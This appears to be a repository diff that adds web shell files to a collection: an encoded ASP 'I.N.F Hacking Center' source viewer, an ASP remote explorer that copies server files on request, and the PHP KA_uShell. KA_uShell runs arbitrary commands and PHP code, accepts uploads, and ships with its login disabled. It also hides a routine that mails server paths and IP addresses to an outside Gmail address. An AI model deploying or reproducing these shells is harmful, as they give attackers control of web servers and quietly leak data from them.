<%#@~^2QgAAA==@#@&w.K{ l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9ýðýxý"PÝçbx~Pþ+30ü.PAN+Mr"R@!Vb@*~A;~Um.kaOk P3U,Öx+hsbPÖ"+^sbðk~"l0kw^+MrPVk8k,|CzýDP`^Go*P@!(.@*Y!Yslhldý[ýMR R@!sk@*A;~UmDr2DkUPgCkýV~nE^Vl ýVm^lðý,5CD9ý:~$ö^ü:üx9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klUýy,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~Aö^ü:ü Nnx~)HDýUYý^ý~AbVLrHkP$;^l8k^rM/r k.RR,@!^r@*Il.NýsP#n,f+kO+0V+MrUNx,fGVCzý,CGVH9+sWU~j+P3VKDG:mUEl~ÇKW0PKþ+0VüD,2[+Mkh c@!Vb@*?1DkaOr:bybP!ü\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmxýs~Cm3Výx9l~!xkþ,$k^ok,)s:m3,ÝçkUP( gRoPz[:bx~#Xl~!öM+-VbsDrHVPMöMüþüxü. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$ÝI,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACOý^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh R&UsbSCVcKD /o@!&l@*' 4daiLx4kwp'x(/2iLx8dai[ 8/ai[ 8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C kcmWs@*AVWMWhl R\n0lxb ZK:@!JC@*[ 4kwI[U8kwI[ 8/ai'U(/wI' 4dwp' 4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl +kk YV@*nl./KU26/CU/k O0@!&l@*' 4daiLx4kwp'x(/2iLx8dai[ 8/ai[ 8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[ 4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI' 4/2ILx8/aILx8kwp[x(/aI[ 4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6ýx[C PqcHRwPKChPzNý l~5C"ý^:ýþOýDc@!4M@*@!sb@*Üm.nDVrPjn,Üm.Ykky,bk2P_WdY^l.ýU,Kü:ü [+,ÇlVýþýM @!(D@*@!sk@*@!J4@*b9.+kPjCDýDýPFýdsýxCPnG9EU!PVöDüxDüVh+0PÝdYNrðr ky,9WkXl ýU~b9ýxý,XCyýU c@!8D@*@!Vb@*PnXYl.nmP$öVüsü~Að+.,AKþ/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lUýU,fG/HCVmDýUý~VöDüxOüsXn4bss+V,Ýçk PbHxý,j+M\nD9+~6^:l ý"Pdlyýs~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPnýdsýxC,Km:Pj+MrPVk.k^k.~vöDx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k ~Kl +^kU+~i^lþhl@!8D@*@!sr@*bNhr PÞr0MnkkUbPÇmV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,fð+.Vn.bPÇCVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k P#+Mk~Pm4l slMýxýPÝ [rDs+,\dR @!4.@*@!8D@*@!^n Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACfÝ@!zm@*Pr9LwCAA==^#~@%><title>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%> - www.infilak.tr.cx</title><%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+ [Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%><center> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%" border=0 bgcolor=black><tr><td><table width="100%" border=0 bgcolor="#666666" cellpadding=1 cellspacing=1><tr><td><center> <%#@~^WQAAAA==@#@&DnkwKx/RS.kD+~J@!khL,/D1xtDYw=&&+cNK:CkU[^6 mKhz0l.dKxF&r 0sWTGcor6P4+kTtDx,y@*E@#@&fhwAAA==^#~@%></td></tr><td bgcolor="#999999" height=32>&nbsp;<Font size=2 Color=000000 Face=Verdana><b>Adres : </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</Font> <input type=hidden name=islem value=basla> <input type=text name=klasor size=49 value="<%=#@~^BgAAAA==V^ldKDjAIAAA==^#~@%>"> &nbsp; <input type=submit value="Kodlarý Göster" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail.com title="E-mail Gönder"><font face=wingdings color=lime size=4>*</font> </a>&nbsp; <a href=http://www.infilaktim.tk title="I.N.F Sitesi" target=_blank><font face=wingdings color=lime size=4>M</font> </a>&nbsp; <a href="?action=help" title="Yardým" target=inf onClick="window.open('?action=help','inf','width=450,height=400 toolbar=no scrollbars=yes' )"><font face=wingdings color=lime size=4>&</font> </a>&nbsp;</td></tr></form></td></table></td></tr><tr><td><table width="100%" border=0 align=center><tr><td bgcolor="#CCCCCC" height=359><%#@~^QwAAAA==r6PUKY,k/^+s~',J8lkVCE,YtU@#@&D+k2Gxk+ch.kOn,JE[HCybVC.LJJ@#@&Vd+nBQAAA==^#~@%><br><center><textarea rows=24 name=kodlar cols=90>
<%#@~^yAAAAA==jY~K4NCK:n,xPU+.\D /M+lDnr(L+1OcJtk1DG/GWDRpHduK:nEb@#@&W8%_KPnc6a+U,JV2Kr~,EJL3slkW.'rJ~,Wl^/+@#@&G4NC:KKRjn N@#@&0GN^l.~{P/n.7+.R4OsV3 mKN+vW(%C:KKR"+d2Kx/P+XY#@#@&.+kwKxd+ AMkO+,VW9VC.@#@&+U[,kWoT4AAA==^#~@%>
<%#@~^CQAAAA==j`A~UkDkVDwMAAA==^#~@%><style>TD {
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
}
BODY {
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
}
P {
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
}
DIV {
FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
}
A:link {
COLOR: #006699; TEXT-DECORATION: none
}
A:active {
COLOR: #006699; TEXT-DECORATION: none
}
A:visited {
COLOR: #006699; TEXT-DECORATION: none
}
A.postlink {
COLOR: #006699; TEXT-DECORATION: none
}
A:hover {
COLOR: #dd6900
}
.bodyline {
BORDER-RIGHT: #98aab1 1px solid; BORDER-TOP: #98aab1 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #98aab1 1px solid; BORDER-BOTTOM: #98aab1 1px solid
}
INPUT {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
}
TEXTAREA {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
}
SELECT {
BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BORDER-RIGHT-COLOR: #006699
}
IMG {
BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px
}
TH {
PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: #f9bc5e url('images/navbar.jpg'); COLOR: #713600; WHITE-SPACE: nowrap; HEIGHT: 27px; TEXT-ALIGN: center
}
TD.cat {
FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: 4px; LETTER-SPACING: 1px; HEIGHT: 27px
}
.title {
FONT-WEIGHT: bold; FONT-SIZE: 13px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
}
.content {
BACKGROUND: none transparent scroll repeat 0% 0%; FONT-FAMILY: Verdana, Helvetica
}
.block-title {
FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica
}
.storytitle {
FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #713600; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
}
.storycat {
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: underline
}
.boxtitle {
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
}
.boxcontent {
FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: red; FONT-FAMILY: Verdana, Helvetica
}
.option {
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
}
.ok {
FONT-WEIGHT: normal; FONT-SIZE: 9px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #000000; FONT-FAMILY: webdings; TEXT-DECORATION: none
}</style><style><!--
body {scrollbar-face-color: #000000; scrollbar-shadow-color: #003333; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #003333; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #993300; scrollbar-arrow-color: #CC3300;}
}
// --></style><%#@~^BwAAAA==n N~kE(oQIAAA==^#~@%>
<%#@~^CgAAAA==d!4~HlMNks8AMAAA==^#~@%><title><%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%></title><body bgcolor=#333333><br><center><font color=red><h4><%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%></center>
<font color=lime>
<%=#@~^BAAAAA==4V2qQEAAA==^#~@%>
<%#@~^HwAAAA==@#@&DnkwKx/RUN@#@&nx9Pd;(@#@&ugcAAA==^#~@%>
</textarea>
<noscript><noscript><plaintext><plaintext>
<!--
   
    HACKING
    
    www.infilak.tr.cx
    Mehdi & HolyDemon
   INF TEAM DURMAZ , DURDURULAMAZ
   Hak Geldi Batýl Zail Oldu..
-->

250
138shell/R/Rem Exp.asp.txt Normal file
View file

@ -0,0 +1,250 @@
<%@ Language=VBScript %>
<%
Option Explicit
Dim giCount
Dim gvAttributes
Dim Ext
Dim ScriptFolder
Dim FolderPath
Dim FileSystem
Dim Drives
Dim Drive
Dim Folders
Dim Folder
Dim SubFolders
Dim SubFolder
Dim Files
Dim File
Dim BgColor, BackgroundColor,FSO
If Request.QueryString("CopyFolder") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFolder Request.QueryString("CopyFolder") & "*", "d:\"
End If
If Request.QueryString("CopyFile") <> "" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"), "d:\"
End If
Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
FolderPath = Request.QueryString("FolderPath")
If FolderPath = "" Then
FolderPath = Request.ServerVariables("PATH_TRANSLATED")
End If
FolderPath = ParseFolder(FolderPath)
ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLATED")) & "images\"
%>
<html>
<head>
<title>Remote Explorer</title>
<style type="text/css">
BODY
{
BACKGROUND-COLOR: #C0C0C0
FONT-FAMILY: 'MS Sans Serif', Arial;
FONT-SIZE: 8px;
MARGIN: 0px
}
td, input, select
{
FONT-FAMILY: 'MS Sans Serif', Arial;
FONT-SIZE: 8px;
}
.Address
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: 1px center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
.Go
{
BACKGROUND-ATTACHMENT: fixed;
BACKGROUND-POSITION: left center;
BACKGROUND-REPEAT: no-repeat;
Padding-LEFT: 10px
}
</style>
</head>
<body bgcolor="#c0c0c0">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<form>
<td width="1%" nowrap>
<select name="FolderPath" id="Drive">
<%
Set Drives = FileSystem.Drives
For Each Drive In Drives
Response.Write "<OPTION value=""" & Drive.DriveLetter & ":\"""
If InStr(UCase(FolderPath), Drive.DriveLetter & ":\") > 0 Then Response.Write " selected"
Response.Write ">"
Response.Write Drive.DriveLetter & " - "
If Drive.DriveType = "Remote" Then
Response.Write Drive.ShareName & " [share]"
ElseIf Drive.DriveLetter <> "A" Then
If Drive.IsReady Then
Response.Write Drive.VolumeName
Else
Response.Write "(Not Ready)"
End If
Else
Response.Write "(Skiped Detection)"
End If
Response.Write "</OPTION>"
Next
%>
</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
</td>
</form>
<td width="1%"> Address: </td>
<form>
<td width="100%">
<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>" style="width:100%" size="20">
</td>
<td width="1%">
<input class="Go" type="submit" value="Go"style="border:1px outset">
</td>
</form>
</tr>
</table>
<%
Set Folder = FileSystem.GetFolder(FolderPath)
Set SubFolders = Folder.SubFolders
Set Files = Folder.Files
%>
<br>
<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center" style="border:1px inset">
<tr>
<td width="40%" height="20" bgcolor="silver"> Name</td>
<td width="10%" bgcolor="silver" align="right">Size </td>
<td width="20%" bgcolor="silver">Type </td>
<td width="20%" bgcolor="silver">Modified </td>
<td width="10%" bgcolor="silver" align="right">Attributes </td>
</tr>
<%
If Not Folder.IsRootFolder Then
BgToggle
%>
<tr title="Top Level">
<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder.Drive & "\")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%BgToggle%>
<tr>
<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder)%>"><font face="wingdings" size="4">¶</font> Up One Level</a> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"> </td>
</tr>
<%
End If
For Each SubFolder In SubFolders
BgToggle
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.ServerVariables("script_name") & "?FolderPath=" & Server.URLPathEncode(FolderPath & SubFolder.Name & "\")%>"><font face="wingdings" size="4">0</font> <b><%=SubFolder.Name%></b></a> (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFolder=<%=Server.URLPathEncode(FolderPath & SubFolder.Name)%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
<td bgcolor="<%=BgColor%>"> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%> </td>
<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModified%> </td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></td>
</tr>
<%
Next
For Each File In Files
BgToggle
Ext = FileExtension(File.Name)
%>
<tr>
<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath)%>" target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a> (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFile=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte </td>
<td bgcolor="<%=BgColor%>"><%=File.Type%></td>
<td bgcolor="<%=BgColor%>"><%=File.DateLastModified%></td>
<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></td>
</tr>
<%Next%>
</table>
</body>
</html>
<%
Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)
Dim lsResult
Dim llTemp
Dim giCount
MaxValuePerIndex = MaxValuePerIndex + 1
Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex - 1)
MinUpperBound = MinUpperBound + 1
Loop
For giCount = MinUpperBound To 0 Step -1
llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
lsResult = lsResult & CStr(llTemp)
If giCount > 0 Then lsResult = lsResult & IndexSeperator
SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
Next
ConvertBinary = lsResult
End Function
Private Sub BgToggle()
BackgroundColor = Not(BackgroundColor)
If BackgroundColor Then
BgColor = "#efefef"
Else
BgColor = "#ffffff"
End If
End Sub
Private Function Attributes(AttributeValue)
Dim lvAttributes
Dim lsResult
lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
If lvAttributes(0) = 1 Then lsResult = "ReadOnly&nbsp;&nbsp;"
If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden&nbsp;&nbsp;"
If lvAttributes(2) = 1 Then lsResult = lsResult & "System&nbsp;&nbsp;"
If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive&nbsp;&nbsp;"
Attributes = lsResult
End Function
Private Function FileExtension(FileName)
Dim lsExt
Dim liCount
For liCount = Len(FileName) To 1 Step -1
If Mid(FileName, liCount, 1) = "." Then
lsExt = Right(FileName, Len(FileName) - liCount)
Exit For
End If
Next
If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
lsExt = ""
End If
FileExtension = lsExt
End Function
Private Function ParseFolder(PathString)
Dim liCount
If Right(PathString, 1) = "\" Then
ParseFolder = PathString
Else
For liCount = Len(PathString) To 1 Step -1
If Mid(PathString, liCount, 1) = "\" Then
ParseFolder = Left(PathString, liCount)
Exit For
End If
Next
End If
End Function
%>

2553
138shell/R/Rem View.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

229
138shell/R/Russian.php.txt Normal file
View file

@ -0,0 +1,229 @@
<!--
/+--------------------------------+\
| KA_uShell |
| <KAdot Universal Shell> |
| Version 0.1.6 |
| 13.03.04 |
| Author: KAdot <KAdot@ngs.ru> |
|--------------------------------|
\+ +/
-->
<html>
<head>
<title>KA_uShell 0.1.6</title>
<style type="text/css">
<!--
body, table{font-family:Verdana; font-size:12px;}
table {background-color:#EAEAEA; border-width:0px;}
b {font-family:Arial; font-size:15px;}
a{text-decoration:none;}
-->
</style>
</head>
<body>
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
// Configuration
$login = "admin";
$pass = "123";
/*/ Authentication
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="KA_uShell"');
header('HTTP/1.0 401 Unauthorized');
exit;}
else {
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
{ echo "×òî íàäî?"; exit;}
}
*/
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "shell";}
// Menu
echo "
|<a href=$self?ac=shell>Shell</a>|
|<a href=$self?ac=upload>File Upload</a>|
|<a href=$self?ac=tools>Tools</a>|
|<a href=$self?ac=eval>PHP Eval Code</a>|
|<a href=$self?ac=whois>Whois</a>|
<br><br><br><pre>";
switch($ac) {
// Shell
case "shell":
echo <<<HTML
<b>Shell</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="shell">
<tr><td>
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
</td></tr>
<tr><td>
<textarea cols="100" rows="25">
HTML;
if (!empty($_POST['c'])){
passthru($_POST['c']);
}
echo "</textarea></td>$tend";
break;
//PHP Eval Code execution
case "eval":
echo <<<HTML
<b>PHP Eval Code</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="eval">
<tr>
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
</tr>
<tr>
<td><input type="submit" value="Enter"></td>
$tend
HTML;
if (isset($_POST['ephp'])){
eval($_POST['ephp']);
}
break;
//Text tools
case "tools":
echo <<<HTML
<b>Tools</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="tools">
<tr>
<td>
<input type="radio" name="tac" value="1">B64 Decode<br>
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
<input type="radio" name="tac" value="3">md5 Hash
</td>
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" value="Enter"></td>
$tend
HTML;
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
switch($_POST['tac']) {
case "1":
echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
break;
case "2":
echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
break;
case "3":
echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
break;
}}
break;
// Uploading
case "upload":
echo <<<HTML
<b>File Upload</b>
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td>Ôàéëî:</td>
<td><input size="48" name="file" type="file"></td>
</tr>
<tr>
<td>Ïàïêà:</td>
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
$tend
HTML;
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
echo "Èìÿ:" .$_FILES['file']['name']. "\n";
echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
} else {
print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
print_r($_FILES);
}
}
break;
// Whois
case "whois":
echo <<<HTML
<b>Whois</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="whois">
<tr>
<td>Äîìåí:</td>
<td><input size="40" type="text" name="wq"></td>
</tr>
<tr>
<td>Õóéç ñåðâåð:</td>
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
</tr>
<tr><td>
<input align="right" type="submit" value="Enter">
</td></tr>
$tend
HTML;
if (isset($_POST['wq']) && $_POST['wq']<>"") {
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
$querty = $_POST['wq']."\r\n";
$fp = fsockopen($wser, 43);
if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
fputs($fp, $querty);
while(!feof($fp)){echo fgets($fp, 4000);}
fclose($fp);
}}
break;
}
?>
</pre>
</body>
</html>

1925
138shell/R/r57 Shell.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

2206
138shell/R/r57.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

Some files were not shown because too many files have changed in this diff Show more